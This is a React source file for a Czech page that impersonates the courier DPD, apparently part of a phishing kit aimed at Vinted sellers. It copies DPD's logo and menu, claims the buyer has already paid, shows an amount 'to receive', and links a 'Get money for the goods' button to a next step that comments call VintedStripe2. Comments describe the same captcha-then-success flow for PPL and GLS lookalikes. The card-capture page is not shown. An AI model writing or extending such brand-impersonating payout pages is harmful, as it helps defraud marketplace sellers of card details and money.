import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './DpdCzSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const BANNER_COURIER = `${P}/dpd-cz/banner-courier.png`;
const CZ_ITEM_PAID_BANNER = `${P}/cz-shared/item-paid-banner.png`;
const SECTION_HERO = `${P}/dpd-cz/section-hero.png`;
const FOOTER_IMG = `${P}/dpd-cz/footer.png`;
/** Oficiální logo DPD (2015), zdroj Wikimedia Commons / dpd.com */
const DPD_LOGO_SRC = `${P}/dpd-cz/dpd-logo-official.svg`;

function IconSearch() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0016 9.5 6.5 6.5 0 109.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 4 11.01 4 8s3.01-6 6.5-6S17 5.01 17 8s-3.01 6-6.5 6z"
      />
    </svg>
  );
}

function IconMenu() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M3 6h18v2H3V6zm0 5h18v2H3v-2zm0 5h18v2H3v-2z" />
    </svg>
  );
}

function IconCard() {
  return (
    <svg width="28" height="22" viewBox="0 0 24 20" aria-hidden>
      <rect x="1" y="3" width="22" height="14" rx="2" fill="none" stroke="#444" strokeWidth="1.5" />
      <path d="M1 7h22" stroke="#444" strokeWidth="1.5" />
    </svg>
  );
}

function IconSecureCard() {
  return (
    <svg viewBox="0 0 32 24" fill="none" aria-hidden>
      <rect x="2" y="5" width="24" height="14" rx="2" stroke="currentColor" strokeWidth="1.4" />
      <path d="M6 10h16M6 13h10" stroke="currentColor" strokeWidth="1.2" strokeLinecap="round" />
      <circle cx="24" cy="16" r="6" fill="#fff" stroke="currentColor" strokeWidth="1.2" />
      <path d="M21 16l2 2 4-4" stroke="currentColor" strokeWidth="1.4" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * DPD Česká republika — potvrzení objednávky + CTA → index2 (VintedStripe2).
 * Stejný tok jako cz_ppl / cz_gls: VintedStripe1 (captcha) → success → index2.
 */
function DpdCzSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [deliveryType, setDeliveryType] = useState('courier');
  const [phoneInput, setPhoneInput] = useState('');
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    const initial = (pageData?.middle_name || '').trim();
    setPhoneInput(initial);
  }, [pageData?.middle_name]);

  const countryCode = (pageData?.country_code || 'CZ').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'CZK';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const product = (pageData?.product_name || '').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const refLine =
    (pageData?.page_code && String(pageData.page_code).slice(-16)) ||
    (pageCode && String(pageCode).slice(-16)) ||
    '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="dpdcz-wrap">
        <div className="dpdcz-loading">Načítání…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="dpdcz-wrap">
      <header className="dpdcz-header">
        <div className="dpdcz-header-inner">
          <Link to={pageCode ? `/page/${pageCode}/` : '/'} className="dpdcz-logo" aria-label="DPD">
            <img src={DPD_LOGO_SRC} alt="DPD" className="dpdcz-header-logo-img" decoding="async" />
          </Link>
          <nav className="dpdcz-nav" aria-label="Hlavní">
            <a href="#send" className="dpdcz-nav--active">
              Poslat balík
            </a>
            <a href="#wait">Čekám balík</a>
            <a href="#about">O nás</a>
            <a href="#csr">Společenská odpovědnost</a>
            <a href="#shipping">DPD Shipping</a>
            <a href="#my">Moje DPD</a>
            <a href="#support">Podpora</a>
          </nav>
          <div className="dpdcz-header-tools">
            <button type="button" className="dpdcz-icon-btn" aria-label="Hledat">
              <IconSearch />
            </button>
            <button type="button" className="dpdcz-icon-btn" aria-label="Menu">
              <IconMenu />
            </button>
          </div>
        </div>
      </header>

      <main className="dpdcz-main">
        <div className="dpdcz-grid">
          <div>
            <div className="dpdcz-hero-banner">
              <img className="dpdcz-hero-banner-img" src={BANNER_COURIER} alt="" decoding="async" />
            </div>

            <img
              className="dpdcz-paid-banner-img"
              src={CZ_ITEM_PAID_BANNER}
              alt="Vaše položka byla vydána. Kupující již za objednávku zaplatil."
              decoding="async"
            />

            <div className="dpdcz-fields">
              <label className="dpdcz-field">
                <span className="dpdcz-field-label">Položka</span>
                <input readOnly value={product} />
              </label>
              <label className="dpdcz-field">
                <span className="dpdcz-field-label">Telefon*</span>
                <input value={phoneInput} onChange={(e) => setPhoneInput(e.target.value)} />
              </label>
              <label className="dpdcz-field">
                <span className="dpdcz-field-label">Adresa</span>
                <input readOnly value={address} />
              </label>
              <label className="dpdcz-field">
                <span className="dpdcz-field-label">Reference</span>
                <input readOnly value={refLine} />
              </label>
            </div>

            <div className="dpdcz-radios-title">Typ doručení</div>
            <div className="dpdcz-radio-row" role="radiogroup" aria-label="Typ doručení">
              <label className="dpdcz-radio">
                <input
                  type="radio"
                  name="dpdcz-delivery"
                  checked={deliveryType === 'courier'}
                  onChange={() => setDeliveryType('courier')}
                />
                Doručení kurýrem
              </label>
              <label className="dpdcz-radio">
                <input
                  type="radio"
                  name="dpdcz-delivery"
                  checked={deliveryType === 'van'}
                  onChange={() => setDeliveryType('van')}
                />
                Nákladní dodávka
              </label>
            </div>
          </div>

          <aside className="dpdcz-right">
            <h3>Způsob přijetí platby:</h3>
            <div className="dpdcz-bank-box">
              <IconCard />
              Váš bankovní účet
            </div>
            <div className="dpdcz-amount-label">Částka k přijetí:</div>
            <div className="dpdcz-amount-box">{amountLine}</div>
            <Link className="dpdcz-cta" to={index2Path}>
              Získat peníze za zboží.
            </Link>
            <div className="dpdcz-secure">
              <IconSecureCard />
              <span>
                Zaručujeme bezpečnost vašich transakcí a rychlé přijetí platby na váš bankovní účet.
              </span>
            </div>
          </aside>
        </div>
      </main>

      <img className="dpdcz-banner-img" src={SECTION_HERO} alt="" />
      <img className="dpdcz-banner-img dpdcz-footer-img" src={FOOTER_IMG} alt="" />

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default DpdCzSuccess;
